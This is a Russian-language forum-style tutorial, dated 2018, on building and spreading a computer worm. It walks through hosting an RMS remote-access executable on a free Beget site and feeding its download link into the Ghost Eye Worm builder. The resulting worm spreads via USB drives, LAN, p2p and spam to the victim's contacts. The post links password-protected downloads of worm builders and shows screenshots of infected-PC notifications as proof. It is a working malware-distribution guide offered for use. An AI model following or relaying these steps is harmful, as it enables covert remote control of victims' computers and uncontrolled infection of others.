November 23, 2018

Сетевой червь.

Сетевой червь — разновидность самовоспроизводящихся компьютерных программ, распространяющихся в локальных и глобальных компьютерных сетях. В отличие от других типов компьютерных вирусов червьявляется самостоятельной программой. Черви могут использовать различные механизмы ("векторы") распространения.

Многовекторный червь — сетевой червь, применяющий для своего распространения несколько разных механизмов (векторов атаки), например, электронную почту и эксплойт ошибки в операционной системе.Черви повреждают файлы и негативно влияют на работу компьютера.

Мы сделаем вирус который будет распространять себя сам

1.Вирус у меня это RMS

2.Регистрируемся на Beget https://beget.com/ru

После регистрации вы увидите это

Нам надо Файловый менеджер

Нажимаем ******.beget.tech

Нажимаем public_html

Нажимаем Загрузить файлы

Нажимаем Browse

Выбираем файл (вирус)---Открыть

Нажимаем Загрузка

Потом пишем в адресной стоке ваш сайт + /название_файла.exe

Пример http://mysite.beget.tech/rms.exe

Вам должны предложить скачать ваш файл (вирус)

Первая часть сделана

Теперь червь

Я пользуюсь Ghost Eye Builder

--Заражает флешку

--Копирует себя в папки

--Перемещения по lan

--p2p

--Спамит везде где пишет жертва

http://prnt.sc/edc2xy

http://prnt.sc/edc31f

Ссылка на загрузку

https://mega.nz/#!BU9BAThL!nEN0xC1Xex4yr5F_6skmHrERwI_8geYKRWs2evVb08g

VirusTotal

Архив

https://www.virustotal.com/ru/file/...ddb5f0aacb90b221c721ace3/analysis/1488030540/

.EXE

https://www.virustotal.com/ru/file/...9f18f8bebeea5478ee677df8/analysis/1488030629/

Пароль: lolzteam.net

Открываем Ghost Eye Worm.exe

Нажимаем Browse

Выбираем Stub который лежит в папке с Ghost Eye Worm

В Direct Download Link пишем свой адрес сайт который мы делали в первом пункте + /название_файла.exe -- который вы загрузили

Пример http://mysite.beget.tech/rms.exe

Дальше делаем все как на скриншотах снизу

Нажимаем Build

Все червь готов осталось только закинуть одному человеку и все

Червь сделает все сам)))

Пак билдеров червей

Рекомендую MonsterWorm

https://mega.nz/#!JQcgjKCa!pkM5ozd-saDtxC_gCu0pTAPr-X-cxOyvKPOHMWnnF1o

Лучше через Sanboxi или Виртуалку

Пароль: lolzteam.org

Пруфhttp://prntscr.com/edouip

Это письма о новых зараженных пк